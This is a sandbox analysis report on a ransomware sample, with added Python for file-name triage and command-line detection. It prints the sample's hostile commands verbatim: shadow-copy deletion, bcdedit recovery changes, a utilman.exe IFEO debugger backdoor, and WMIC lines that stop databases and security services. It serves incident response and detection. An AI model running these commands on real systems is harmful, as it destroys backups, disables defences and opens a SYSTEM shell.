Analysis

max time kernel: 45s
max time network: 52s
platform: windows7_x64
resource: win7v200430
submitted: 09-05-2020 18:48

Static task: static1
Behavioral task: behavioral1 (sample svhost1.exe, resource win7v200430)
Behavioral task: behavioral2 (sample svhost1.exe, resource win10v200430)
General

Target: svhost1.exe
Size: 2.8MB
MD5: 0527539f8c9af38ea8c36e9d2be595cd
SHA1: a9d38a3b10c1d3dbf5eb00024303877e3c84cdab
SHA256: 247ddce4c369810b27385acb97298a107ac440b70d23f047e20224dd6e68e536
SHA512: 00e01f1668c09f98643312e15044a8dc4ef38b72bb08106bd967af6f130ebaca8899e3bf22b143db49a0daf42db690b8890d10e3455804e817647e6f977242c4
Malware Config
Signatures

Runs net.exe

Interacts with shadow copies (2 TTPs, 1 IoC)
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
  PID 1616  vssadmin.exe

Suspicious use of WriteProcessMemory (141 IoCs)
Each child process appears as three consecutive writes by its parent; the entries are collapsed below to one line per parent -> child pair with the number of writes. The report shows the first 64 of 141 entries.
Processes:
  1100 svhost1.exe     -> 596  powershell.exe   (3 writes)
  596  powershell.exe  -> 660  net.exe          (3)
  1100 svhost1.exe     -> 984  powershell.exe   (3)
  984  powershell.exe  -> 1068 WMIC.exe         (3)
  984  powershell.exe  -> 1616 vssadmin.exe     (3)
  984  powershell.exe  -> 1608 reg.exe          (3)
  984  powershell.exe  -> 1620 reg.exe          (3)
  984  powershell.exe  -> 1704 WMIC.exe         (3)
  984  powershell.exe  -> 1892 WMIC.exe         (3)
  984  powershell.exe  -> 1840 WMIC.exe         (3)
  984  powershell.exe  -> 1916 WMIC.exe         (3)
  984  powershell.exe  -> 1264 WMIC.exe         (3)
  984  powershell.exe  -> 540  WMIC.exe         (3)
  984  powershell.exe  -> 2036 WMIC.exe         (3)
  984  powershell.exe  -> 2012 WMIC.exe         (3)
  984  powershell.exe  -> 1452 WMIC.exe         (3)
  984  powershell.exe  -> 1480 WMIC.exe         (3)
  984  powershell.exe  -> 1308 WMIC.exe         (3)
  984  powershell.exe  -> 276  WMIC.exe         (3)
  984  powershell.exe  -> 432  WMIC.exe         (3)
  984  powershell.exe  -> 216  WMIC.exe         (3)
  984  powershell.exe  -> 1500 WMIC.exe         (1, listing cut off here)

Suspicious use of AdjustPrivilegeToken (1565 IoCs)
Processes (the report shows the first 64 of 1565 entries; identical repeats are collapsed):
  596  powershell.exe   SeDebugPrivilege
  984  powershell.exe   SeDebugPrivilege
  1068 WMIC.exe         SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35 (the whole set enabled twice)
  1784 vssvc.exe        SeBackupPrivilege, SeRestorePrivilege, SeAuditPrivilege
  1704 WMIC.exe         same set as PID 1068 (listing cut off after 34)
The unnamed LUIDs 33, 34 and 35 are SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege and SeCreateSymbolicLinkPrivilege. WMIC.exe enables every privilege present in its token when it starts, so the bulk of the 1565 entries is WMIC's normal start-up behaviour multiplied by the number of WMIC launches in the process tree, not a privilege escalation by the sample.

Drops file in Program Files directory (100 IoCs)
Encrypted copies are written beside the originals with the suffix _ID_2876361323_[decryption@qbmail.biz].trix, i.e. the victim ID and the contact mailbox are embedded in every file name; the suffix is written as [SUFFIX] below. The report shows the first 64 of 100 entries.
Processes: svhost1.exe for every entry.
File created:
  C:\Program Files\UnprotectCompare.ppsx[SUFFIX]
  C:\Program Files\UnpublishRestore.xps[SUFFIX]
  C:\Program Files\NewRevoke.bin[SUFFIX]
  C:\Program Files\OutRequest.ini[SUFFIX]
  C:\Program Files\RequestImport.cmd[SUFFIX]
  C:\Program Files\WatchOut.clr[SUFFIX]
  C:\Program Files\ConvertFromCheckpoint.js[SUFFIX]
  C:\Program Files\UseInvoke.xltm[SUFFIX]
  C:\Program Files\BlockImport.xhtml[SUFFIX]
  C:\Program Files\desktop.ini[SUFFIX]
  C:\Program Files\WaitConnect.xps[SUFFIX]
  C:\Program Files\7-Zip\7z.dll[SUFFIX]
  C:\Program Files\7-Zip\7-zip.chm[SUFFIX]
  C:\Program Files\7-Zip\7-zip32.dll[SUFFIX]
  C:\Program Files\Internet Explorer\F12Resources.dll[SUFFIX]
  C:\Program Files\Internet Explorer\JSProfilerCore.dll[SUFFIX]
  C:\Program Files\Internet Explorer\iedvtool.dll[SUFFIX]
  C:\Program Files\Internet Explorer\perfcore.dll[SUFFIX]
  C:\Program Files\Internet Explorer\Timeline.cpu.xml[SUFFIX]
  C:\Program Files\Internet Explorer\msdbg2.dll[SUFFIX]
  C:\Program Files\Internet Explorer\ieinstal.exe[SUFFIX]
  C:\Program Files\Internet Explorer\IEShims.dll[SUFFIX]
  C:\Program Files\Internet Explorer\jsprofilerui.dll[SUFFIX]
  C:\Program Files\Internet Explorer\networkinspection.dll[SUFFIX]
  C:\Program Files\Internet Explorer\Timeline.dll[SUFFIX]
  C:\Program Files\Internet Explorer\sqmapi.dll[SUFFIX]
  C:\Program Files\Internet Explorer\iediagcmd.exe[SUFFIX]
  C:\Program Files\Internet Explorer\MemoryAnalyzer.dll[SUFFIX]
  C:\Program Files\Internet Explorer\DiagnosticsHub.DataWarehouse.dll[SUFFIX]
  C:\Program Files\Internet Explorer\jsdbgui.dll[SUFFIX]
  C:\Program Files\Internet Explorer\Timeline_is.dll[SUFFIX]
File opened for modification:
  C:\Program Files\desktop.ini
  C:\Program Files (x86)\desktop.ini
  C:\Program Files\InstallBackup.cab
  C:\Program Files\BlockImport.xhtml
  C:\Program Files\ConvertFromCheckpoint.js
  C:\Program Files\MergeSet.xlsx
  C:\Program Files\ResetAssert.vssx
  C:\Program Files\WatchOut.clr
  C:\Program Files\OutRequest.ini
  C:\Program Files\UseInvoke.xltm
  C:\Program Files\UnpublishRestore.xps
  C:\Program Files\RequestImport.cmd
  C:\Program Files\7-Zip\7-zip.dll
  C:\Program Files\7-Zip\7-zip32.dll
  C:\Program Files\Internet Explorer\iedvtool.dll
  C:\Program Files\Internet Explorer\msdbg2.dll
  C:\Program Files\Internet Explorer\D3DCompiler_47.dll
  C:\Program Files\Internet Explorer\ielowutil.exe
  C:\Program Files\Internet Explorer\IEShims.dll
  C:\Program Files\Internet Explorer\JSProfilerCore.dll
  C:\Program Files\Internet Explorer\pdmproxy100.dll
  C:\Program Files\Internet Explorer\Timeline.cpu.xml
  C:\Program Files\Internet Explorer\Timeline_is.dll
  C:\Program Files\Internet Explorer\jsprofilerui.dll
  C:\Program Files\Internet Explorer\F12Resources.dll
  C:\Program Files\Internet Explorer\pdm.dll
  C:\Program Files\Internet Explorer\DiagnosticsHub_is.dll
  C:\Program Files\Internet Explorer\iediagcmd.exe
  C:\Program Files\Internet Explorer\DiagnosticsHub.DataWarehouse.dll
  C:\Program Files\Internet Explorer\ieproxy.dll
  C:\Program Files\Internet Explorer\perf_nt.dll
  C:\Program Files\Internet Explorer\F12.dll
  C:\Program Files\Internet Explorer\ie9props.propdesc

Drops file in Windows directory (56 IoCs)
Processes: svhost1.exe for every entry. All 56 entries are shown: each of the following files was opened for modification and an encrypted copy <name>_ID_2876361323_[decryption@qbmail.biz].trix was created beside it.
  C:\Windows\mib.bin
  C:\Windows\system.ini
  C:\Windows\winhlp32.exe
  C:\Windows\DtcInstall.log
  C:\Windows\notepad.exe
  C:\Windows\bfsvc.exe
  C:\Windows\write.exe
  C:\Windows\msdfmap.ini
  C:\Windows\regedit.exe
  C:\Windows\win.ini
  C:\Windows\WindowsUpdate.log
  C:\Windows\HelpPane.exe
  C:\Windows\WMSysPr9.prx
  C:\Windows\twain_32.dll
  C:\Windows\splwow64.exe
  C:\Windows\twain.dll
  C:\Windows\twunk_32.exe
  C:\Windows\Starter.xml
  C:\Windows\explorer.exe
  C:\Windows\Professional.xml
  C:\Windows\hh.exe
  C:\Windows\TSSysprep.log
  C:\Windows\twunk_16.exe
  C:\Windows\bootstat.dat
  C:\Windows\WindowsShell.Manifest
  C:\Windows\fveupdate.exe
  C:\Windows\setupact.log
  C:\Windows\PFRO.log
The list includes explorer.exe, notepad.exe, regedit.exe, write.exe and hh.exe, so the sample applies no exclusion for the Windows directory or for executables; a host that has run to completion should be expected to be unbootable into a usable desktop rather than merely missing user documents.
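The two file lists above share one naming scheme, <original name>_ID_<victim id>_[<contact e-mail>].<extension>, which is also the quickest host-side indicator during incident response. The following Python triage helper is an added example and not part of the sandbox report or the sample: it recognises that scheme in a directory listing, extracts the victim ID, mailbox and extension instead of hard-coding this sample's values, and reports which originals are still present beside their encrypted copy. The listing it runs on is constructed from paths in this report plus two clean names that must not match; the function and field names are this example's own.

```python
import re
from collections import namedtuple

# Naming scheme seen in this report: <original name>_ID_<victim id>_[<contact e-mail>].<ext>
# The ID, mailbox and extension are captured rather than hard-coded so the same
# function works on another host hit by the same family.
RANSOM_SUFFIX = re.compile(
    r"^(?P<original>.+?)_ID_(?P<victim_id>\d+)_\[(?P<email>[^\]\s]+@[^\]\s]+)\]\.(?P<ext>[A-Za-z0-9]+)$"
)

EncryptedFile = namedtuple("EncryptedFile", "path original victim_id email ext")


def parse_encrypted_name(path):
    """Return an EncryptedFile for a path carrying the ransom suffix, else None."""
    directory, sep, name = path.rpartition("\\")
    m = RANSOM_SUFFIX.match(name)
    if not m:
        return None
    original = directory + sep + m.group("original")
    return EncryptedFile(path, original, m.group("victim_id"), m.group("email"), m.group("ext"))


def triage_listing(paths):
    """Split a file listing into encrypted copies and everything else, and report
    which originals still sit beside their encrypted copy (the report records those
    only as 'opened for modification', not as deleted)."""
    encrypted, plain = [], set()
    for p in paths:
        ef = parse_encrypted_name(p)
        if ef:
            encrypted.append(ef)
        else:
            plain.add(p)
    return {
        "encrypted": encrypted,
        "originals_present": sorted(ef.original for ef in encrypted if ef.original in plain),
        "victim_ids": sorted({ef.victim_id for ef in encrypted}),
        "emails": sorted({ef.email for ef in encrypted}),
        "extensions": sorted({ef.ext for ef in encrypted}),
    }


# Constructed listing: paths taken from this report plus two clean names that
# must not be flagged (one of them contains "_ID_" but not the full suffix).
SAMPLE_LISTING = [
    r"C:\Windows\notepad.exe",
    r"C:\Windows\notepad.exe_ID_2876361323_[decryption@qbmail.biz].trix",
    r"C:\Program Files\7-Zip\7z.dll_ID_2876361323_[decryption@qbmail.biz].trix",
    r"C:\Program Files\Internet Explorer\Timeline.cpu.xml",
    r"C:\Program Files\Internet Explorer\Timeline.cpu.xml_ID_2876361323_[decryption@qbmail.biz].trix",
    r"C:\Windows\System32\ntdll.dll",
    r"C:\Users\Admin\Documents\report_ID_card.docx",
]

if __name__ == "__main__":
    for key, value in triage_listing(SAMPLE_LISTING).items():
        print(key, value)
```

On a live host the same function can be fed the output of a recursive directory walk; a single victim ID across all hits confirms one run of the encryptor, while more than one mailbox or extension points at a second infection or a different build.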

Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.

Suspicious behavior: EnumeratesProcesses (2 IoCs)
Processes:
  596  powershell.exe
  984  powershell.exe

Modifies boot configuration data using bcdedit (1 TTP, 2 IoCs)
Processes:
  2024 bcdedit.exe
  1968 bcdedit.exe
Both command lines (see the process tree) read "bcdedit.exe /set -encodedCommand ZABlAGYAYQB1AGwAdAA= recoveryenabled No -inputFormat xml -outputFormat text", and the same for "bootstatuspolicy ignoreallfailures". The base64 is the UTF-16LE encoding of the word "default": this is what PowerShell substitutes when a script passes an unquoted {default} script block as an argument to a native executable. bcdedit therefore never received "/set {default} recoveryenabled No" and most likely rejected both commands, so the intended disabling of Windows Recovery should not be assumed to have taken effect without checking the boot configuration of the host.

Deletes shadow copies (2 TTPs)
Ransomware often targets backup files to inhibit system recovery.

Modifies service (2 TTPs, 5 IoCs)
Processes:
  vssvc.exe  Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer
  vssvc.exe  Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer
  vssvc.exe  Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SwProvider_{b5946137-7b9f-4925-af80-51abd60b20d5}
  vssvc.exe  Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer
  vssvc.exe  Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer
These keys are the Volume Shadow Copy service's own writer diagnostics, created when vssvc.exe was started to serve the deletion requests above; they are a side effect of the attack, not a service configuration the sample changed.

Drops desktop.ini file(s) (3 IoCs)
Processes: svhost1.exe
  File opened for modification C:\Program Files\desktop.ini
  File opened for modification C:\Program Files (x86)\desktop.ini
  File opened for modification C:\$Recycle.Bin\S-1-5-21-910373003-3952921535-3480519689-1000\desktop.ini

Sets file execution options in registry (2 TTPs, 4 IoCs)
Processes:
  reg.exe  Key created     \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe
  reg.exe  Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe\Debugger = "Hotkey Disabled"
  reg.exe  Key created     \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe
  reg.exe  Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe\Debugger = "%windir%\\system32\\cmd.exe"
An IFEO Debugger value is prepended to the command line every time the named image is launched. For utilman.exe this is the accessibility backdoor: the Ease of Access button or Win+U on the logon screen now starts cmd.exe as SYSTEM, without a password. For taskmgr.exe the value "Hotkey Disabled" is not an executable, so Task Manager fails to start and the user cannot kill the encryptor from it. Both keys survive a reboot and must be removed during cleanup.

Discovers systems in the same network (1 TTP, 1 IoC)

Processes

svhost1.exe  (PID 1100)
  image:        C:\Users\Admin\AppData\Local\Temp\svhost1.exe
  command line: "C:\Users\Admin\AppData\Local\Temp\svhost1.exe"
  - Suspicious use of WriteProcessMemory
  - Drops file in Program Files directory
  - Drops file in Windows directory
  - Drops desktop.ini file(s)

  powershell.exe  (PID 596)
    image:        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    command line: powershell.exe -NoExit -Command -
    - Suspicious use of WriteProcessMemory
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious behavior: EnumeratesProcesses
    "-Command -" makes PowerShell read the script from standard input, which svhost1.exe supplies over a pipe; the script body never appears in any process command line, so it has to be recovered from PowerShell script block logging (event ID 4104) or inferred from the children below.

    net.exe  (PID 660)
      command line: "C:\Windows\system32\net.exe" view
      - Discovers systems in the same network

  powershell.exe  (PID 984)
    image:        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    command line: powershell.exe -NoExit -Command -
    - Suspicious use of WriteProcessMemory
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious behavior: EnumeratesProcesses

    WMIC.exe  (PID 1068)
      command line: "C:\Windows\System32\Wbem\WMIC.exe" SHADOWCOPY DELETE
      - Suspicious use of AdjustPrivilegeToken

    vssadmin.exe  (PID 1616)
      command line: "C:\Windows\system32\vssadmin.exe" Delete Shadows /All /Quiet
      - Interacts with shadow copies

    reg.exe
      command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /f /v Debugger /t REG_SZ /d %windir%\system32\cmd.exe
      - Sets file execution options in registry

    reg.exe
      command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe" /f /v Debugger /t REG_SZ /d "Hotkey Disabled"
      - Sets file execution options in registry

    WMIC.exe, 20 launches (ReportServer appears twice), one per service-name pattern, each with the command line
      "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '<pattern>'" call stopservice
    with <pattern>, in launch order (the first launch, PID 1704, is also flagged Suspicious use of AdjustPrivilegeToken):
      %%MSSQL%%
      %%SQLAgent%%
      %%SQLBrowser%%
      %%ReportServer%%
      %%SQLWriter%%
      %%SQL%%
      %%MySQL%%
      %%firebird%%
      %%WinDefend%%
      %%mr2kserv%%
      %%IISADMIN%%
      %%Database%%
      %%QuickBooksDB%%
      %%MongoDB%%
      %%MBAMService%%
      %%ReportServer%%
      %%Exchange%%
      %%wsbexchange%%
      %%QB%%
      %%Quick%%

    WMIC.exe, 18 launches, one per process-name pattern, each with the command line
      "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '<pattern>'" call terminate
    with <pattern>, in launch order:
      %%QB%%
      %%msftefd%%
      %%msftesql%%
      %%mysql%%
      %%node%%
      %%noderunner%%
      %%omtsreco%%
      %%oracle%%
      %%sql%%
      %%store%%
      %%acess%%
      %%acrord%%
      %%code%%
      %%devenv%%
      %%avp%%
      %%swprv%%
      %%VSSVC%%
      %%sqlsrvr%%

    In WQL "%" matches any run of characters, so the doubled "%%" matches exactly what a single "%" would: each pattern is a plain case-insensitive substring match. Besides database, QuickBooks, Exchange and IIS services, the list stops or kills security software (WinDefend is Windows Defender, MBAMService is Malwarebytes, avp is Kaspersky) and the shadow-copy components swprv and VSSVC, and terminates document and developer tools (acrord, code, devenv) to release locks on open files before encryption.

    bcdedit.exe  (PIDs 2024 and 1968)
      command line: "C:\Windows\system32\bcdedit.exe" /set -encodedCommand ZABlAGYAYQB1AGwAdAA= recoveryenabled No -inputFormat xml -outputFormat text
      - Modifies boot configuration data using bcdedit
      command line: "C:\Windows\system32\bcdedit.exe" /set -encodedCommand ZABlAGYAYQB1AGwAdAA= bootstatuspolicy ignoreallfailures -inputFormat xml -outputFormat text
      - Modifies boot configuration data using bcdedit

vssvc.exe  (PID 1784, top level: the Volume Shadow Copy service, started to serve the deletion requests)
  image:        C:\Windows\system32\vssvc.exe
  command line: C:\Windows\system32\vssvc.exe
  - Suspicious use of AdjustPrivilegeToken
  - Modifies service
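The process tree is the part of this report that translates directly into detection: every pre-encryption step is a child of powershell.exe with a distinctive command line. The Python below is an added example, not part of the sandbox report or the sample. It runs a small rule set over constructed process-creation records shaped like the tree (parent image, image, command line), flags shadow-copy deletion, bcdedit recovery changes, IFEO Debugger writes, WMIC mass service stops and process kills, and "net view", tells the utilman.exe accessibility backdoor apart from the taskmgr.exe "Hotkey Disabled" blocker, and decodes the -encodedCommand argument that PowerShell inserted into the bcdedit lines. The record field names, rule names and the accessibility-binary list are this example's own assumptions; one benign vssadmin query from explorer.exe is included to show the rules do not fire on read-only use.

```python
import base64
import re

# Binaries the logon screen can launch as SYSTEM; an IFEO Debugger on any of them
# is the classic accessibility ("sticky keys") backdoor. List assumed for this example.
ACCESSIBILITY_BINARIES = {"utilman.exe", "sethc.exe", "osk.exe", "narrator.exe",
                          "magnify.exe", "displayswitch.exe", "atbroker.exe"}

# (rule name, pattern over the full command line); the names are this example's own.
RULES = [
    ("shadow_copy_deletion",
     re.compile(r'vssadmin(\.exe)?"?\s+delete\s+shadows|wmic(\.exe)?"?\s+shadowcopy\s+delete', re.I)),
    ("boot_recovery_disabled",
     re.compile(r'bcdedit.*(recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures)', re.I)),
    ("ifeo_debugger_set",
     re.compile(r'reg(\.exe)?"?\s+add\s+.*Image File Execution Options\\.*?/v\s+Debugger', re.I)),
    ("wmic_service_stop", re.compile(r'wmic.*win32_service.*call\s+stopservice', re.I)),
    ("wmic_process_terminate", re.compile(r'wmic.*win32_process.*call\s+terminate', re.I)),
    ("network_share_discovery", re.compile(r'\bnet1?(\.exe)?"?\s+view\b', re.I)),
]
IFEO_TARGET = re.compile(r'Image File Execution Options\\([^"\\]+)".*?/d\s+(?:"([^"]*)"|(\S+))', re.I)
ENCODED_ARG = re.compile(r'-encodedCommand\s+([A-Za-z0-9+/=]+)', re.I)


def decode_scriptblock_arg(cmdline):
    """Decode the '-encodedCommand <base64>' that PowerShell substitutes when a script
    passes an unquoted {block} to a native exe (UTF-16LE text of the block).
    Returns the text, or None if the marker is absent or the payload is not valid."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def describe_ifeo(cmdline):
    """Explain a 'reg add ... /v Debugger' line: which image is hijacked and how."""
    t = IFEO_TARGET.search(cmdline)
    if not t:
        return ""
    target = t.group(1).lower()
    debugger = t.group(2) if t.group(2) is not None else t.group(3)
    if target in ACCESSIBILITY_BINARIES:
        kind = "accessibility binary: SYSTEM shell from the logon screen"
    elif not debugger.lower().endswith(".exe"):
        kind = "not an executable: the target can no longer start"
    else:
        kind = "execution hijack: the debugger runs on every launch"
    return f"{target} Debugger={debugger!r} ({kind})"


def analyse(events):
    """Apply every rule to every event; return findings, each with an analyst note."""
    findings = []
    for ev in events:
        cmd = ev["cmdline"]
        for name, rx in RULES:
            if not rx.search(cmd):
                continue
            note = ""
            if name == "ifeo_debugger_set":
                note = describe_ifeo(cmd)
            elif name == "boot_recovery_disabled":
                decoded = decode_scriptblock_arg(cmd)
                if decoded is not None:
                    note = (f"-encodedCommand decodes to {decoded!r}: the script passed "
                            f"{{{decoded}}} unquoted, so bcdedit received a malformed "
                            "argument list and probably rejected the command")
            findings.append({"rule": name, "parent": ev["parent"], "image": ev["image"],
                             "cmdline": cmd, "note": note})
    return findings


def rules_hit(findings):
    """Distinct rules, sorted; several together are the pre-encryption pattern above."""
    return sorted({f["rule"] for f in findings})


# Constructed process-creation records in the shape of the tree above. The last
# one, a read-only vssadmin query from explorer.exe, is benign and must not fire.
SAMPLE_EVENTS = [
    {"parent": "powershell.exe", "image": "net.exe",
     "cmdline": r'"C:\Windows\system32\net.exe" view'},
    {"parent": "powershell.exe", "image": "WMIC.exe",
     "cmdline": r'"C:\Windows\System32\Wbem\WMIC.exe" SHADOWCOPY DELETE'},
    {"parent": "powershell.exe", "image": "vssadmin.exe",
     "cmdline": r'"C:\Windows\system32\vssadmin.exe" Delete Shadows /All /Quiet'},
    {"parent": "powershell.exe", "image": "reg.exe",
     "cmdline": r'"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /f /v Debugger /t REG_SZ /d %windir%\system32\cmd.exe'},
    {"parent": "powershell.exe", "image": "reg.exe",
     "cmdline": r'"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe" /f /v Debugger /t REG_SZ /d "Hotkey Disabled"'},
    {"parent": "powershell.exe", "image": "WMIC.exe",
     "cmdline": r'''"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%MSSQL%%'" call stopservice'''},
    {"parent": "powershell.exe", "image": "WMIC.exe",
     "cmdline": r'''"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%VSSVC%%'" call terminate'''},
    {"parent": "powershell.exe", "image": "bcdedit.exe",
     "cmdline": r'"C:\Windows\system32\bcdedit.exe" /set -encodedCommand ZABlAGYAYQB1AGwAdAA= recoveryenabled No -inputFormat xml -outputFormat text'},
    {"parent": "explorer.exe", "image": "vssadmin.exe",
     "cmdline": r'"C:\Windows\system32\vssadmin.exe" list shadows'},
]
```

In production the records would come from Sysmon event ID 1 or Windows Security event 4688 with command-line auditing enabled; the rules are deliberately command-line only because the PowerShell parent gives away nothing in its own command line ("-Command -" reads the script from stdin). Any one rule on its own is noisy on an administrator's workstation; three or more from the same parent within a minute is the pattern the tree above shows.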